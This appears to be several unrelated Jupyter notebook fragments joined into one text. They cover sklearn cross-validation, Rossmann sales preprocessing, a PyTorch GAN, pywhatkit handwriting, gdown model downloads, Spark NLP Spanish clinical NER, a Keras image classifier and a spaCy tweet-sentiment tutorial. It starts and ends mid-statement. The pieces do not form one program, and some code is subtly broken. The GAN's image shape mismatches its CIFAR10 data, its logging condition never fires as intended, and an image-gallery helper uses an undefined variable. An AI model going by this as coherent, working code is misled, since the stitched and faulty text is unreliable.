= StratifiedKFold(n_splits = 5, shuffle=False) #교차검증 방법 설정 # cross_val_score(모델, X , y , 사용할 교차검증 방법) cross_val_score(dt_clf, X, y, cv=skfold # 나눌 덩어리 횟수 )LeaveOnOutfrom sklearn.model_selection import LeaveOneOut leavefold = LeaveOneOut() #교차검증 방법 설정 cross_val_score(dt_clf, iris.data, iris.target, cv=leavefold # 나눌 덩어리 횟수 ) cross_val_score(dt_clf, iris.data, iris.target, cv=leavefold # 나눌 덩어리 횟수 ).mean()0.0. IMPORTSimport pandas as pd import inflection import math import matplotlib.pyplot as plt import seaborn as sns import numpy as np0.1. Helper Functions 0.2. Loading Datadf_sales_raw = pd.read_csv('dataset/train.csv', low_memory = False) df_store_raw = pd.read_csv('dataset/store.csv', low_memory = False) #merge df_raw = pd.merge(df_sales_raw, df_store_raw, how = 'left', on = 'Store')1.0. DATA DESCRIPTIONdf1 = df_raw.copy()1.1. Rename Columnscols_old = ['Store', 'DayOfWeek', 'Date', 'Sales', 'Customers', 'Open', 'Promo', 'StateHoliday', 'SchoolHoliday', 'StoreType', 'Assortment', 'CompetitionDistance', 'CompetitionOpenSinceMonth', 'CompetitionOpenSinceYear', 'Promo2', 'Promo2SinceWeek', 'Promo2SinceYear', 'PromoInterval'] snakecase = lambda x: inflection.underscore(x) cols_new = list(map(snakecase, cols_old)) #rename df1.columns = cols_new1.2. Data Dimensionsprint('Number of Rows: {}'.format(df1.shape[0])) print('Number of Columns: {}'.format(df1.shape[1]))Number of Rows: 1017209 Number of Columns: 181.3. Data Typesdf1['date'] = pd.to_datetime(df1['date']) df1.dtypes1.4. Check NAdf1.isna().sum()1.5. Fillout NAdf1['competition_distance'].max() #competition_distance df1['competition_distance'] = df1['competition_distance'].apply(lambda x: 200000.0 if math.isnan(x) else x) #competition_open_since_month df1['competition_open_since_month'] = df1.apply(lambda x: x['date'].month if math.isnan(x['competition_open_since_month']) else x['competition_open_since_month'], axis =1) #competition_open_since_year df1['competition_open_since_year'] = df1.apply(lambda x: x['date'].year if math.isnan(x['competition_open_since_year']) else x['competition_open_since_year'], axis = 1) #promo2_since_week df1['promo2_since_week'] = df1.apply(lambda x: x['date'].week if math.isnan(x['promo2_since_week']) else x['promo2_since_week'], axis =1) #promo2_since_year df1['promo2_since_year'] = df1.apply(lambda x: x['date'].year if math.isnan(x['promo2_since_year']) else x['promo2_since_year'], axis =1) #promo_interval month_map = {1: 'Jan',2: 'Feb',3: 'Mar',4: 'Apr',5: 'May',6: 'Jun',7: 'Jul',8: 'Aug',9: 'Sept',10: 'Oct',11: 'Nov',12: 'Dec',} df1['promo_interval'].fillna(0, inplace = True) df1['month_map'] = df1['date'].dt.month.map(month_map) df1['is_promo'] = df1[['promo_interval','month_map']].apply( lambda x: 0 if x['promo_interval'] == 0 else 1 if x['month_map'] in x['promo_interval'].split(',') else 0, axis = 1) df1.sample(5).T df1.isna().sum()1.6. Change Typedf1['competition_open_since_month'] = df1['competition_open_since_month'].astype( int ) df1['competition_open_since_year'] = df1['competition_open_since_year'].astype( int ) df1['promo2_since_week'] = df1['promo2_since_week'].astype( int ) df1['promo2_since_year'] = df1['promo2_since_year'].astype( int )1.7. Descriptive Statisticalnum_attributes = df1.select_dtypes( include = ('int64','float64') ) cat_attributes = df1.select_dtypes( exclude = ('int64','float64', 'datetime64[ns]') )1.7.1 Numerical Attributes# Central Tendency: mean, median ct1 = pd.DataFrame(num_attributes.apply( np.mean ) ).T ct2 = pd.DataFrame(num_attributes.apply( np.median ) ).T #Dispersion: std, min, max, range, skew, kurtosis d1 = pd.DataFrame( num_attributes.apply( np.std) ).T d2 = pd.DataFrame( num_attributes.apply( min ) ).T d3 = pd.DataFrame( num_attributes.apply( max ) ).T d4 = pd.DataFrame( num_attributes.apply( lambda x: x.max() -x.min() ) ).T d5 = pd.DataFrame( num_attributes.apply( lambda x: x.skew() ) ).T d6 = pd.DataFrame( num_attributes.apply( lambda x: x.kurtosis() ) ).T #Concatenate m = pd.concat( [d2, d3, d4, ct1, ct2, d1, d5, d6]).T.reset_index() m.columns = ['attributes','min','max','range','mean','median','std','skew','kurtosis'] m sns.displot(df1['competition_distance'])1.7.2 Categorical Attributescat_attributes.apply( lambda x: x.unique().shape ).T aux1 = df1[(df1['state_holiday']!= '0') & ( df1['sales'] > 0)] plt.subplot (1,3,1) sns.boxplot( x= 'state_holiday',y= 'sales', data= aux1) plt.subplot (1,3,2) sns.boxplot( x= 'store_type',y= 'sales', data= aux1) plt.subplot (1,3,3) sns.boxplot( x= 'assortment',y= 'sales', data= aux1)[View in Colaboratory](https://colab.research.google.com/github/miguelrq/GANs/blob/master/prueba.ipynb)import torch.nn as nn import torch !pip install --no-cache-dir -I pillow import argparse import os import numpy as np import math import torchvision.transforms as transforms from torchvision.utils import save_image from torch.utils.data import DataLoader from torchvision import datasets from torch.autograd import Variable import torch.nn as nn import torch.nn.functional as F import torch os.makedirs('images', exist_ok=True) n_epochs = 20 batch_size = 64 lr = 0.0002 b1 = 0.5 b2 = 0.999 n_cpu = 8 latent_dim = 100 img_size = 28 channels = 1 sample_interval = 800 img_shape = (channels, img_size, img_size) cuda = True if torch.cuda.is_available() else False class Generator(nn.Module): def __init__(self): super(Generator, self).__init__() def block(in_feat, out_feat, normalize=True): layers = [nn.Linear(in_feat, out_feat)] if normalize: layers.append(nn.BatchNorm1d(out_feat, 0.8)) layers.append(nn.LeakyReLU(0.2, inplace=True)) return layers self.model = nn.Sequential( *block(latent_dim, 128, normalize=False), *block(128, 256), *block(256, 512), *block(512, 1024), nn.Linear(1024, int(np.prod(img_shape))), nn.Tanh() ) def forward(self, z): img = self.model(z) img = img.view(img.size(0), *img_shape) return img class Discriminator(nn.Module): def __init__(self): super(Discriminator, self).__init__() self.model = nn.Sequential( nn.Linear(int(np.prod(img_shape)), 512), nn.LeakyReLU(0.2, inplace=True), nn.Linear(512, 256), nn.LeakyReLU(0.2, inplace=True), nn.Linear(256, 1), nn.Sigmoid() ) def forward(self, img): img_flat = img.view(img.size(0), -1) validity = self.model(img_flat) return validity # Loss function adversarial_loss = torch.nn.BCELoss() # Initialize generator and discriminator generator = Generator() discriminator = Discriminator() if cuda: generator.cuda() discriminator.cuda() adversarial_loss.cuda() # Configure data loader os.makedirs('../../data/CIFAR10', exist_ok=True) dataloader = torch.utils.data.DataLoader( datasets.CIFAR10('../../data/CIFAR10', train=True, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)) ])), batch_size=batch_size, shuffle=True) # Optimizers optimizer_G = torch.optim.Adam(generator.parameters(), lr=lr, betas=(b1, b2)) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=lr, betas=(b1, b2)) Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ---------- # Training # ---------- for epoch in range(n_epochs): for i, (imgs, _) in enumerate(dataloader): # Adversarial ground truths valid = Variable(Tensor(imgs.size(0), 1).fill_(1.0), requires_grad=False) fake = Variable(Tensor(imgs.size(0), 1).fill_(0.0), requires_grad=False) # Configure input real_imgs = Variable(imgs.type(Tensor)) # ----------------- # Train Generator # ----------------- optimizer_G.zero_grad() # Sample noise as generator input z = Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], latent_dim)))) # Generate a batch of images gen_imgs = generator(z) # Loss measures generator's ability to fool the discriminator g_loss = adversarial_loss(discriminator(gen_imgs), valid) g_loss.backward() optimizer_G.step() # --------------------- # Train Discriminator # --------------------- optimizer_D.zero_grad() # Measure discriminator's ability to classify real from generated samples real_loss = adversarial_loss(discriminator(real_imgs), valid) fake_loss = adversarial_loss(discriminator(gen_imgs.detach()), fake) d_loss = (real_loss + fake_loss) / 2 d_loss.backward() optimizer_D.step() if n_epochs%100==0: print ("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]" % (epoch, n_epochs, i, len(dataloader), d_loss.data[0], g_loss.data[0])) batches_done = epoch * len(dataloader) + i if batches_done % sample_interval == 0: save_image(gen_imgs.data[:25], 'images/%d.png' % batches_done, nrow=5, normalize=True) !ls from PIL import Image import glob image_list = [] for filename in glob.glob('images/*.png'): #assuming gif im=Image.open(filename) image_list.append(im) import numpy as np import matplotlib.pyplot as plt def gallery(array, ncols=9): nindex, height, width, intensity = array.shape nrows = nindex//ncols assert nindex == nrows*ncols # want result.shape = (height*nrows, width*ncols, intensity) result = (array.reshape(nrows, ncols, height, width, intensity) .swapaxes(1,2) .reshape(height*nrows, width*ncols, intensity)) return result def make_array(): return np.array([np.array(img) for imf in image_list]) array = make_array() result = gallery(array) plt.figure(figsize=(13,20)) plt.imshow(result) plt.show() !ls ../../data/Fashionmnist/raw/Text to Handwriting using PythonTo convert text to handwriting, there is a library known as **PyWhatKit** in Python. It provides a lot of useful features, one can explore them [here](https://pypi.org/project/pywhatkit/).>To Install PyWhatKit, Run the following command in Terminal or Command prompt:>`pip install pywhatkit`In the code below, I first imported the pywhatkit and OpenCV libraries in Python. Here pywhatkit is used to convert text to handwritten text and OpenCV is used to visualize the image in which we are writing handwritten text.!pip install pywhatkit import pywhatkit as kit import cv2 kit.text_to_handwriting("Hello, Welcome to Text to Handwriting Program.", save_to="handwriting.png") img = cv2.imread("handwriting.png") cv2.imshow("Text to Handwriting", img) cv2.waitKey(0) cv2.destroyAllWindows()Download ModelsVGG19, ResNet50, and Xception models have been trained for view classification and can be downloaded using 'gdown' to your local directory. If necessary, use pip to install gdown.!pip install gdown import gdown import os # make models directory if necessary if not os.path.isdir('../models/'): os.mkdir('../models/') # download ResNet50 url = 'https://drive.google.com/u/0/uc?id=1PNTthLKk4qtpS3qedQPsJrQKev5x875n&export=download' output = '../models/ResNet50/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'resnet50.h5py'), quiet=False) # download VGG19 url = 'https://drive.google.com/u/0/uc?id=1Dmxs6Xpx9yBJA5R4W_tOvY4l0Y2YiEAN&export=download' output = '../models/VGG19/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'vgg19.h5py'), quiet=False) # download Xception url = 'https://drive.google.com/u/0/uc?id=19H8faj-jtvNmlhuIxQEOFGdFez4ku8xv&export=download' output = '../models/Xception/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'xception.h5py'), quiet=False)Downloading... From: https://drive.google.com/u/0/uc?id=1PNTthLKk4qtpS3qedQPsJrQKev5x875n&export=download To: E:\CAP\CAP-Automation\models\ResNet50\resnet50.h5py 190MB [03:08, 1.01MB/s] Downloading... From: https://drive.google.com/u/0/uc?id=1Dmxs6Xpx9yBJA5R4W_tOvY4l0Y2YiEAN&export=download To: E:\CAP\CAP-Automation\models\VGG19\vgg19.h5py 173MB [02:57, 972kB/s] Downloading... From: https://drive.google.com/u/0/uc?id=19H8faj-jtvNmlhuIxQEOFGdFez4ku8xv&export=download To: E:\CAP\CAP-Automation\models\Xception\xception.h5py 167MB [03:23, 821kB/s]![JohnSnowLabs](https://nlp.johnsnowlabs.com/assets/images/logo.png)[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/JohnSnowLabs/spark-nlp-workshop/blob/master/tutorials/streamlit_notebooks/healthcare/NER_DIAG_PROC.ipynb) **Detect Diagnoses and Procedures in Spanish** To run this yourself, you will need to upload your license keys to the notebook. Just Run The Cell Below in order to do that. Also You can open the file explorer on the left side of the screen and upload `license_keys.json` to the folder that opens.Otherwise, you can look at the example outputs at the bottom of the notebook. 1. Colab Setup Import license keysimport json import os from google.colab import files license_keys = files.upload() with open(list(license_keys.keys())[0]) as f: license_keys = json.load(f) # Defining license key-value pairs as local variables locals().update(license_keys) # Adding license key-value pairs to environment variables os.environ.update(license_keys)Install dependencies# Installing pyspark and spark-nlp ! pip install --upgrade -q pyspark==3.1.2 spark-nlp==$PUBLIC_VERSION # Installing Spark NLP Healthcare ! pip install --upgrade -q spark-nlp-jsl==$JSL_VERSION --extra-index-url https://pypi.johnsnowlabs.com/$SECRET # Installing Spark NLP Display Library for visualization ! pip install -q spark-nlp-displayImport dependencies into Python and start the Spark sessionimport pandas as pd from pyspark.ml import Pipeline from pyspark.sql import SparkSession import pyspark.sql.functions as F import sparknlp from sparknlp.annotator import * from sparknlp_jsl.annotator import * from sparknlp.base import * import sparknlp_jsl spark = sparknlp_jsl.start(license_keys['SECRET']) # manually start session # params = {"spark.driver.memory" : "16G", # "spark.kryoserializer.buffer.max" : "2000M", # "spark.driver.maxResultSize" : "2000M"} # spark = sparknlp_jsl.start(license_keys['SECRET'],params=params)2. Construct the pipeline Create the pipelinedocument_assembler = DocumentAssembler() \ .setInputCol('text')\ .setOutputCol('document') sentence_detector = SentenceDetector() \ .setInputCols(['document'])\ .setOutputCol('sentence') tokenizer = Tokenizer()\ .setInputCols(['sentence']) \ .setOutputCol('token') word_embeddings = WordEmbeddingsModel.pretrained("embeddings_scielowiki_300d","es","clinical/models")\ .setInputCols(["document","token"])\ .setOutputCol("word_embeddings") clinical_ner = MedicalNerModel.pretrained("ner_diag_proc","es","clinical/models")\ .setInputCols("sentence","token","word_embeddings")\ .setOutputCol("ner") ner_converter = NerConverter()\ .setInputCols(['sentence', 'token', 'ner']) \ .setOutputCol('ner_chunk') nlp_pipeline = Pipeline(stages=[ document_assembler, sentence_detector, tokenizer, word_embeddings, clinical_ner, ner_converter])embeddings_scielowiki_300d download started this may take some time. Approximate size to download 351.2 MB [OK!] ner_diag_proc download started this may take some time. Approximate size to download 14.2 MB [OK!]3. Create example inputs# Enter examples as strings in this array input_list = [ """En el último año, el paciente ha sido sometido a una apendicectomía por apendicitis aguda , una artroplastia total de cadera izquierda por artrosis, un cambio de lente refractiva por catarata del ojo izquierdo y actualmente está programada una tomografía computarizada de abdomen y pelvis con contraste intravenoso para descartar la sospecha de cáncer de colon. Tiene antecedentes familiares de cáncer colorrectal, su padre tuvo cáncer de colon ascendente (hemicolectomía derecha).""" ]4. Use the pipeline to create outputsempty_df = spark.createDataFrame([['']]).toDF('text') pipeline_model = nlp_pipeline.fit(empty_df) df = spark.createDataFrame(pd.DataFrame({'text': input_list})) result = pipeline_model.transform(df)5. Visualize resultsfrom sparknlp_display import NerVisualizer NerVisualizer().display( result = result.collect()[0], label_col = 'ner_chunk', document_col = 'document' )Visualize outputs as data frameexploded = F.explode(F.arrays_zip('ner_chunk.result', 'ner_chunk.metadata')) select_expression_0 = F.expr("cols['0']").alias("chunk") select_expression_1 = F.expr("cols['1']['entity']").alias("ner_label") result.select(exploded.alias("cols")) \ .select(select_expression_0, select_expression_1).show(truncate=False) result = result.toPandas()+--------------------------------------------+-------------+ |chunk |ner_label | +--------------------------------------------+-------------+ |apendicitis aguda |DIAGNOSTICO | |artroplastia total de cadera izquierda |PROCEDIMIENTO| |artrosis |DIAGNOSTICO | |catarata del ojo izquierdo |DIAGNOSTICO | |tomografía computarizada de abdomen y pelvis|PROCEDIMIENTO| |cáncer de colon |DIAGNOSTICO | |cáncer colorrectal |DIAGNOSTICO | |cáncer de colon ascendente |DIAGNOSTICO | |hemicolectomía derecha |PROCEDIMIENTO| +--------------------------------------------+-------------+Load constanteswith open("config.yaml",'r') as config_file: config = yaml.safe_load(config_file) IMAGE_WIDTH = config["image_width"] IMAGE_HEIGHT = config["image_height"] IMAGE_DEPTH = config["image_depth"] DATA_DIR= pathlib.Path(config["data_dir"]) MODELS_DIR = pathlib.Path(config["models_dir"]) TARGET_NAME= config["target_name"] DATA_TRAIN_FILE= config["data_train_file"] DATA_TEST_FILE= config["data_test_file"]Functionsdef build_image_database(path,target): """ Build a pandas dataframe with target class and access path to images. Parameters: - path (Path): Path pattern to read csv file containing images information - target(str): The second column to extract from the file Return: A pandas dataframe, ------- """ #Load file _df= pd.read_csv(path, names=["all"], ) #Recover data _df["image_id"]=_df["all"].apply(lambda x: x.split(' ')[0]) _df[target]=_df["all"].apply(lambda x: ' '.join(x.split(' ')[1:])) _df[target].unique() #Create path _df["path"]= _df['image_id'].apply( lambda x: DATA_DIR/"images"/(x+'.jpg')) return _df.drop(columns=["all"]) def build_classification_model(df: pd.DataFrame,target: str, images: str): """Build a tensorflow model using information from target and images columns in dataframes Parameters ---------- df (pandas.dataFrame): dataframe with target and images columns target (str): column name for target variable images (str): column name for images Returns ------ tensorflow model built & compiled """ #Compute number of classes for output layer nb_classes = df[target].nunique() # Computer images size for input layer size = df[images].iloc[0].shape # Building the model model = Sequential() model.add(Conv2D(filters=32, kernel_size=(5,5), activation='relu', input_shape=size)) model.add(Conv2D(filters=32, kernel_size=(5,5), activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(rate=0.25)) model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu')) model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(rate=0.25)) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(rate=0.5)) model.add(Dense(nb_classes , activation='softmax')) #Compilation of the model model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) #output layer of nb_classes return model def show_image(df,row,target): """show the image in the ligne row and the associated target column Args: df (pandas.dataFrame): the dataframe of images row (int): the index of the row target (string): the column name of the associated label Return ------ None """ assert target in df.columns, f"Column {target} not found in dataframe" assert 'path' in df.columns, f"Column path doens't not exit in dataframe" _img = plt.imread(df.loc[row,'path']) plt.imshow(_img) return def load_resize_image(path,height,width): """Load an image and resize it to the target size Parameters: - path (Path): path to the file to load and resize - height (int): the height of the final resized image - width(int): the width of the resized image Return ------ numpy.array containing resized image """ return np.array(Image.open(path).resize((width,height))) def build_x_and_y(df: pd.DataFrame, target: str, images: str): """build x tensor and y tensor for model fitting. parameters ---------- df(pd.DataFrame): dataframe target(str): name of target column images (str): name of resized images column Returns ------- x (numpy.array): tensor of x values y (numpy.array): tensor of y values """ x= np.array(df[images].to_list()) y=tf.keras.utils.to_categorical(df[target].astype('category').cat.codes) return x,y def classify_images(images,model,classes_names=None): """Classify images through a tensorflow model. Parameters: ----------- images(np.array): set of images to classify model (tensorflow.keras.Model): tensorflow/keras model Returns ------- predicted classes """ results = model.predict(images) classes = np.argmax(results,axis=1) if classes_names is not None: classes = np.array(classes_names[classes]) return classes def save_model(model ,saving_dir=MODELS_DIR,basename=TARGET_NAME,append_time=False): """Save tf/Keras model in saving_dir folder Parameters ---------- model (tf/Keras model): model to be saved saving_dir (path): location to save model file basename (str): the basename of the model append_time (bool): indicate if the time will be append to the basename """ model_name = f"{basename}{'_' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S') if append_time else ''}" model.save(f"{saving_dir}/neural_networks/{model_name}.h5") return model_nameRead train & test filetrain_df = build_image_database(DATA_DIR/DATA_TRAIN_FILE,TARGET_NAME) test_df = build_image_database(DATA_DIR/DATA_TEST_FILE,TARGET_NAME) # Previous the dataframe train_df.head() test_df.head()View some imagesshow_image(train_df, np.random.randint(0,train_df.shape[0]), TARGET_NAME) show_image(test_df,np.random.randint(0,test_df.shape[0]),TARGET_NAME)Resize Images#Resize train images train_df['resized_image'] = train_df.apply( lambda r: load_resize_image(r['path'],IMAGE_HEIGHT,IMAGE_WIDTH), axis=1) #Resize test images test_df['resized_image'] = test_df.apply( lambda r: load_resize_image(r['path'],IMAGE_HEIGHT,IMAGE_WIDTH), axis=1)Split dataset into x and yX_train,y_train = build_x_and_y(train_df,TARGET_NAME,'resized_image') X_test,y_test = build_x_and_y(test_df,TARGET_NAME,'resized_image')Build & train the modelmodel = build_classification_model(train_df,TARGET_NAME,"resized_image") %load_ext tensorboard !rm -rf ./logs log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S") tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %%time epochs = 5 history = model.fit(X_train,y_train,batch_size = 32,epochs = epochs , validation_data = (X_test,y_test), callbacks=[tensorboard_callback] ) %tensorboard --logdir logs/fitPredict from the modelclasses_names = train_df[TARGET_NAME].astype('category').cat.categories classify_images(X_test[10:20],model,classes_names)Save the modelmodel_name = save_model(model,MODELS_DIR) with open(MODELS_DIR/"classes"/f"{model_name}.yaml","w") as classe_file: yaml.dump(list(classes_names),classe_file)"Mother's day Sentiment analysis - with spaCy"> "In this notebook I try to use a competition dataset of tweets reacting to Mother's day and classify their sentiments with spaCy"- toc: true- branch: master- badges: true- comments: true- categories: [nlp, eda, sentiment]- hide: false#hide import requests zip_file = requests.get('https://he-s3.s3.amazonaws.com/media/hackathon/hackerearth-test-draft-1-102/predicting-tweet-sentiments-231101b4/fa62f5d69a9f11ea.zip?Signature=2yxQgjub3w4jc%2BhnFKq0GEwmNEE%3D&Expires=1590825609&AWSAccessKeyId=') with open('data.zip', 'wb') as f: f.write(zip_file.content) #hide !cp /content/drive/My\ Drive/Data/tweets_mother_day.zip ./data.zip !unzip data.zipArchive: data.zip creating: dataset/ inflating: dataset/train.csv inflating: dataset/test.csvSetup paths We will use the method from my previous [post](https://mani2106.github.io/Blog-Posts/nlp/eda/sentiment/2020/05/23/_Hackerearth_mothers_day_sentiment.html) to clean the text.from pathlib import Path import pandas as pd DATA_PATH = Path('dataset/') DRIVE_PATH = Path(r"/content/drive/My Drive/Spacy/Pretrained") train_data = pd.read_csv(DATA_PATH/'train.csv', index_col=0) train_data.head()Let's check average length of text before cleaning.#collapse print(sum( train_data['original_text'].apply(len).tolist() )/train_data.shape[0])227.42102009273572Clean links with regextrain_data['original_text'].replace( # Regex is match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True)Let's check the average length again.#hide print(sum( train_data['original_text'].apply(len).tolist() )/train_data.shape[0])185.95672333848532The regex did it's job I suppose.train_data.head()In my previous exploratory [post](https://mani2106.github.io/Blog-Posts/nlp/eda/sentiment/2020/05/23/_Hackerearth_mothers_day_sentiment.html), I have seen the data and I think that the features other than the text may not be required, (ie)- lang- retweet_count- original_author Class distribution - `0` must mean `Neutral`- `1` means `Positive`- `-1` means `Negative`train_data['sentiment_class'].value_counts().plot(kind='bar')Let's see some sentences with negative examples, I am interested why they should be negative on a happy day(Mother's day)list_of_neg_sents = train_data.loc[train_data['sentiment_class'] == -1, 'original_text'].tolist() #collapse pprint(list_of_neg_sents[:5])['Happy mothers day To all This doing a mothers days work. Today been quiet ' 'but Had time to reflect. Dog walk, finish a jigsaw do the garden, learn few ' 'more guitar chords, drunk some strawberry gin and tonic and watch Lee evens ' 'on DVD. My favourite place to visit. #isolate ', 'Remembering the 3 most amazing ladies who made me who I am! My late ' 'grandmother iris, mum carol and great grandmother Ethel. Missed but never ' 'forgotten! Happy mothers day to all those great mums out there! Love sent to ' 'all xxxx ', 'Happy Mothers Day to everyone tuning in. This is the 4th Round game between ' 'me and @CastigersJ Live coverage on @Twitter , maybe one day @SkySportsRL or ' 'on the OurLeague app', "Happy Mothers Day ! We hope your mums aren't planning to do any work around " 'the house today! Surely it can wait until next week? #plumbers ' '#heatingspecialists #mothersday #mothersday ', "Happy mothers day to all those mums whos children can't be with them today. " 'My[...]Well some tweets actually express their feelings for their deceased mothers. This is understandable. We can use traditional NLP methods or deep learning methods to model the text. We will try the deep learning in this notebook . Deep Learning approach with Spacy It's recommended [here](https://spacy.io/usage/trainingtransfer-learning) that to improve performance of the classifier, **Language model pretraining** is one way to do so. Spacy requires a `.jsonl` format of input to train text Get texts from the dataframe and store in `jsonl` format more about that [here](https://spacy.io/api/clipretrain-jsonl). We can also load the test data to get some more sample for the `pretraining`, this will not cause **Data Leakage** because we are not giving any labels to the model.test_data = pd.read_csv(DATA_PATH/'test.csv', index_col=0) test_data.head()Let's clean the test set for links as welltest_data['original_text'].replace( # Regex pattern to match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True) test_data.shape texts_series = pd.concat([train_data['original_text'], test_data['original_text']], axis='rows')Let's check the lengthtexts_series.shape[0], train_data.shape[0]+test_data.shape[0]So now we can use this `texts_series` to create the `jsonl` file.list_of_texts = [ # Form dictionary with 'text' key {'text': value} for _, value in texts_series.items() ]I will use `srsly` to write this list of dictionaries to a `jsonl` fileimport srsly # saving to my Google drive srsly.write_jsonl(DRIVE_PATH/'pretrain_texts.jsonl', list_of_texts)We can see a few lines from the saved file.#collapse from pprint import pprint with Path(DRIVE_PATH/'pretrain_texts.jsonl').open() as f: lines = [next(f) for x in range(5)] pprint(lines)['{"text":"Happy #MothersDay to all you amazing mothers out there! I know ' "it's hard not being able to see your mothers today but it's on all of us to " 'do what we can to protect the most vulnerable members of our society. ' '#BeatCoronaVirus "}\n', '{"text":"Happy Mothers Day Mum - I\'m sorry I can\'t be there to bring you ' "Mothers day flowers & a cwtch - honestly at this point I'd walk on hot coals " "to be able to. But I'll be there with bells on as soon as I can be. Love you " 'lots xxx (p.s we need more photos!) "}\n', '{"text":"Happy mothers day To all This doing a mothers days work. Today been ' 'quiet but Had time to reflect. Dog walk, finish a jigsaw do the garden, ' 'learn few more guitar chords, drunk some strawberry gin and tonic and watch ' 'Lee evens on DVD. My favourite place to visit. #isolate "}\n', '{"text":"Happy mothers day to this beautiful woman...royalty soothes you ' 'mummy jeremy and emerald and more #PrayForRoksie #UltimateLoveNG "}\n', '{"t[...]Start Pretraining We should download a pretrained to model to use, Here I am using _en_core_web_md_ from `Spacy`. This can be confusing (ie) Why should I train a pretrained model, if I can download one, The idea is that the downloaded pretrained model would have been trained with a **very different** type of dataset, but it already has some knowledge on interpreting words in English sentences. But here we have dataset of tweets which the downloaded pretrained model may or may not have seen during it's training, So we use our dataset to **fine-tune** the downloaded model, so that with minimum training it can start understanding the tweets right away.#collapse !python -m spacy download en_core_web_mdTraining results#collapse %%bash # Command to pretrain a language model # Path to jsonl file with data # Using md model as the base # saving the model on my Drive folder # training for 50 iterations with seed set to 0 python -m spacy pretrain /content/drive/My\ Drive/Spacy/Pretrained/pretrain_texts.jsonl \ /usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5 \ /content/drive/My\ Drive/Spacy/Pretrained/ \ -i 50 -s 0 \ℹ Not using GPU ⚠ Output directory is not empty It is better to use an empty directory or refer to a new output path, then the new directory will be created for you. ✔ Saved settings to config.json ⠙ Loading input texts... ✔ Loaded input texts ⠙ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠹ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠸ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠼ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠴ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠦ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠧ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠇ Loading model '/usr/loca[...]I have chosen to use the default parameters however one might need to change them for their problem. We can see from the logs that the loss value in the last iteration is `18639`, but since the batch_size was `3000` our data must have splitted to `2` batches, (number of texts are `4622`) we should also take the previous log entry to account which is loss of `33658`, So the average of them would be `26148.5`, This number might be intimidating but the only way to check if it actually helps is to try to train a model with it. If it doesn't then we can resume the training from the model saved on the last epoch. We keep only the last model from the pretraining.#hide !mv /content/drive/My\ Drive/Spacy/Pretrained/model49.bin /content/drive/My\ Drive/Spacy/ !mv /content/drive/My\ Drive/Spacy/Pretrained/*.json* /content/drive/My\ Drive/Spacy/ #hide !rm /content/drive/My\ Drive/Spacy/Pretrained/*.bin #hide !mkdir /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter !mv /content/drive/My\ Drive/Spacy/model49.bin /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter !mv /content/drive/My\ Drive/Spacy/*g.json* /content/drive/My\ Drive/Spacy/Pretrained/fifty_iterLet's train a text classifier with `Spacy` Text classifier with Spacy Now that we have a pretrained model, We now need to prepare data for training the text classifier. Let's have a look at the [data format](https://spacy.io/usage/trainingtraining-simple-style) that Spacy expects the data to be in. Data Generation ```json{ "entities": [(0, 4, "ORG")], "heads": [1, 1, 1, 5, 5, 2, 7, 5], "deps": ["nsubj", "ROOT", "prt", "quantmod", "compound", "pobj", "det", "npadvmod"], "tags": ["PROPN", "VERB", "ADP", "SYM", "NUM", "NUM", "DET", "NOUN"], "cats": {"BUSINESS": 1.0},}```This format works for training via code, as given in the examples above, There is also another format mentioned [here](https://spacy.io/api/annotationjson-input) `cats` is the only part we need to worry about, this must be where they look for categories/classes. We have three classes in our dataset - `0` for `Neutral`- `1` for `Positive`- `-1` for `Negative`and they are **mutually-exclusive** (There can be only one label for a sentence) We also need to split the training data we have to training and evaluation sets so that we can see how well our model has learnt the problem. Let's try to programmatically generate the training data from pandas dataframelabel_map = {1:'POSITIVE', -1:'NEGATIVE', 0:'NEUTRAL'}We need list of tuples of text and the annotation details in a dictionary as mentioned above.# Adapted from sample data in https://spacy.io/usage/training#training-simple-style train_json = [ # Get the text from dataframe row (tweet.original_text, {'cats':{ label_map[tweet.sentiment_class]:1.0 } }) for tweet in train_data[['original_text', 'sentiment_class']].itertuples(index=False, name='Tweet') ] train_json[0]Now we will split the training datafrom sklearn.model_selection import train_test_split # Stratified split with labels train_split, eval_split = train_test_split(train_json, test_size=0.2, stratify=train_data['sentiment_class']) len(train_split), len(eval_split)We should save them as `json` files to give them as input to the command line `train` utility in spacy.import json with Path(DRIVE_PATH/'train_clas.json').open('w') as f: json.dump(train_split, f) with 